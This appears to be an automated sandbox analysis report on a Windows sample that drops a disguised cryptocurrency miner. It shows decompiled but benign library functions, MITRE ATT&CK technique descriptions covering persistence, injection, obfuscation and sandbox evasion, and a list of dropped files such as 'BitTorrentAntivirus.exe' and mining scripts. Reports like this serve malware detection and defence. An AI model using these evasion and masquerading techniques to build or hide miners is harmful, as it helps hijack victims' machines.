Opcode ID: 96861bb51d76edbe331b4ee821184b248afc8c332025cd56d282c3557bf4e331
Instruction ID: 5f1c91debf140b5f951403f71a54babd19b8d9be995b2d9e22900e592bfa4bc7
Opcode Fuzzy Hash: 96861bb51d76edbe331b4ee821184b248afc8c332025cd56d282c3557bf4e331
Instruction Fuzzy Hash: 68113C75900219ABCB11CFA9E8459EFBBF8FF48350B1445AAE905F3310DB359A45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E8B5BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00E8B5BE(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				signed int _t15;
				intOrPtr _t20;
				void* _t24;
				signed int _t25;
				void* _t29;
				intOrPtr _t30;
				void* _t31;
				void* _t36;

				_t28 = __edx;
				_t24 = __ecx;
				_t23 = __ebx;
				E00E7EFB0(__edx, 0xe9bc00, 0xc);
				_t30 = 0;
				 *((intOrPtr*)(_t31 - 0x1c)) = 0;
				_t29 = E00E892B5(__ebx, _t24, __edx);
				_t25 =  *0xe9eda0; // 0xfffffffe
				if(( *(_t29 + 0x350) & _t25) == 0 ||  *((intOrPtr*)(_t29 + 0x4c)) == 0) {
					L5:
					_t15 = E00E8A701(5);
					 *((intOrPtr*)(_t31 - 4)) = _t30;
					_t30 =  *((intOrPtr*)(_t29 + 0x48));
					 *((intOrPtr*)(_t31 - 0x1c)) = _t30;
					_t36 = _t30 -  *0xe9ed40; // 0x30a20e8
					if(_t36 != 0) {
						if(_t30 != 0) {
							asm("lock xadd [esi], eax");
							if((_t15 | 0xffffffff) == 0 && _t30 != 0xe9eb20) {
								E00E887FE(_t30);
							}
						}
						_t20 =  *0xe9ed40; // 0x30a20e8
						 *((intOrPtr*)(_t29 + 0x48)) = _t20;
						_t30 =  *0xe9ed40; // 0x30a20e8
						 *((intOrPtr*)(_t31 - 0x1c)) = _t30;
						asm("lock inc dword [esi]");
					}
					 *((intOrPtr*)(_t31 - 4)) = 0xfffffffe;
					E00E8B64F();
					goto L3;
				} else {
					_t30 =  *((intOrPtr*)(_t29 + 0x48));
					L3:
					if(_t30 != 0) {
						return E00E7EFF6(_t28);
					}
					E00E88886(_t23, _t28, _t29, _t30);
					goto L5;
				}
			}

0x00e8b5be
0x00e8b5be
0x00e8b5be
0x00e8b5c5
0x00e8b5ca
0x00e8b5cc
0x00e8b5d4
0x00e8b5d6
0x00e8b5e2
0x00e8b5f5
0x00e8b5f7
0x00e8b5fd
0x00e8b600
0x00e8b603
0x00e8b606
0x00e8b60c
0x00e8b610
0x00e8b615
0x00e8b619
0x00e8b624
0x00e8b629
0x00e8b619
0x00e8b62a
0x00e8b62f
0x00e8b632
0x00e8b638
0x00e8b63b
0x00e8b63b
0x00e8b63e
0x00e8b645
0x00000000
0x00e8b5e9
0x00e8b5e9
0x00e8b5ec
0x00e8b5ee
0x00e8b65f
0x00e8b65f
0x00e8b5f0
0x00000000
0x00e8b5f0

APIs

Part of subcall function 00E892B5: GetLastError.KERNEL32(?,00EA0F50,00E840E4,00EA0F50,?,?,00E83B5F,?,?,00EA0F50), ref: 00E892B9
Part of subcall function 00E892B5: _free.LIBCMT ref: 00E892EC
Part of subcall function 00E892B5: SetLastError.KERNEL32(00000000,?,00EA0F50), ref: 00E8932D
Part of subcall function 00E892B5: _abort.LIBCMT ref: 00E89333

_abort.LIBCMT ref: 00E8B5F0
_free.LIBCMT ref: 00E8B624

Strings

, xrefs: 00E8B61B

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID:
API String ID: 289325740-3162483948
Opcode ID: 3a7e863b3844aab7e9af67c7de00c1f122b5c7df9f16204d9116f28bd5263a5e
Instruction ID: a53d9b6278ed19def033a25623c979a9137dd00148e3a290ab499e3a0ff93c01
Opcode Fuzzy Hash: 3a7e863b3844aab7e9af67c7de00c1f122b5c7df9f16204d9116f28bd5263a5e
Instruction Fuzzy Hash: 40018031D01A21DFCB25FF699901629B3A0BF08B24B19214BE92CB7781EB306D019FC2

Uniqueness

Uniqueness Score: -1.00%

Function 00E6130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E6130B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E00E6DD4C(0xea0ee8, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E00E6DD73(0xea0ee8, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0xec2158(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0xe935b4);
								}
							}
						}
					}
				}
				return 0;
			}

0x00e61312
0x00e61375
0x00e61314
0x00e61314
0x00e6131b
0x00e61331
0x00e6133a
0x00e6133f
0x00e61347
0x00e6134f
0x00e61357
0x00e61365
0x00e61365
0x00e61357
0x00e61347
0x00e6133a
0x00e6131b
0x00e6137d

APIs

Part of subcall function 00E6DD73: _swprintf.LIBCMT ref: 00E6DD99
Part of subcall function 00E6DD73: _strlen.LIBCMT ref: 00E6DDBA
Part of subcall function 00E6DD73: SetDlgItemTextW.USER32(?,00E9E154,?), ref: 00E6DE1A
Part of subcall function 00E6DD73: GetWindowRect.USER32(?,?), ref: 00E6DE54
Part of subcall function 00E6DD73: GetClientRect.USER32(?,?), ref: 00E6DE60

GetDlgItem.USER32(00000000,00003021), ref: 00E6134F
SetWindowTextW.USER32(00000000,00E935B4), ref: 00E61365

Strings

0, xrefs: 00E6130E

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: f5ee9580aed12656b0716ffde109379650c6228152c3b577439fd8ff7d86cc43
Instruction ID: 05650aa34f8d86ac53048fba853487347e6fbf4ee1842c276339ec614206017c
Opcode Fuzzy Hash: f5ee9580aed12656b0716ffde109379650c6228152c3b577439fd8ff7d86cc43
Instruction Fuzzy Hash: 55F0A4301C034CAADF261F71EC09BE93F98AB15389F0DA0A4FD46746B1C775C995EA54

Uniqueness

Uniqueness Score: -1.00%

Function 00E70B29 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00E70B29(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00E66E63(E00E66E68(_t6, 0xea0f50, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0xea0f50, 0xea0f50, 2);
				}
				return _t2;
			}

0x00e70b29
0x00e70b2f
0x00e70b38
0x00e70b41
0x00000000
0x00e70b60
0x00e70b61

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00E70C48,?,?,00E70CBF,?,?,?,?,?,00E70CA9), ref: 00E70B2F
GetLastError.KERNEL32(?,?,00E70CBF,?,?,?,?,?,00E70CA9), ref: 00E70B3B

Part of subcall function 00E66E68: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E66E86

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00E70B44

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: ce61d3d33c7cd9f253a8e5ffc7ab93a909c11a0e60be3eb4fe24b5a52c33bfe2
Instruction ID: 0a00173530edd49c019d31866dcfeee7946095592f25778bd94d3432db25064a
Opcode Fuzzy Hash: ce61d3d33c7cd9f253a8e5ffc7ab93a909c11a0e60be3eb4fe24b5a52c33bfe2
Instruction Fuzzy Hash: E3D05EB6A485207ACE102334AC0ADAF7945AB92774F246716F23DB52F5CA210F5182E5

Uniqueness

Uniqueness Score: -1.00%

Function 00E6DD29 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E6DD29(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}

0x00e6dd2c
0x00e6dd3c
0x00e6dd44
0x00e6dd46
0x00000000
0x00e6dd46
0x00e6dd4b

APIs

GetModuleHandleW.KERNEL32(00000000,?,00E6D5EF,?), ref: 00E6DD2E
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00E6D5EF,?), ref: 00E6DD3C

Strings

RTL, xrefs: 00E6DD36

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 566b0b21d09ae977eda40c1b7adac4542801fee3adcd9a766a875d5c4b14ba45
Instruction ID: 868d72a468cd304872c7231c464ca54861c662f6bbbc886fad866ef07df6d7ab
Opcode Fuzzy Hash: 566b0b21d09ae977eda40c1b7adac4542801fee3adcd9a766a875d5c4b14ba45
Instruction Fuzzy Hash: 94C022303883003AEB3023323C0CB832A08AB00B02F08200EF200FA0C0CAE2C80882A0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BitTorrentAntivirus.exe

C:\ProgramData\H.vbs

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_NcbService_c3fd3c3f830283a6ba0c7e839e220c16a1c8146_00000000_0c1abfca\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4896.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER544F.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER65A4.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER983E.tmp.txt

C:\ProgramData\SHA256SUMS

C:\ProgramData\WinRing0x64.sys

C:\ProgramData\benchmark_10M.cmd

C:\ProgramData\benchmark_1M.cmd

C:\ProgramData\config.json

C:\ProgramData\pool_mine_example.cmd

C:\ProgramData\rtm_ghostrider_example.cmd

C:\ProgramData\solo_mine_example.cmd

C:\ProgramData\start.cmd

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl

Windows Analysis Report
file.exe

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre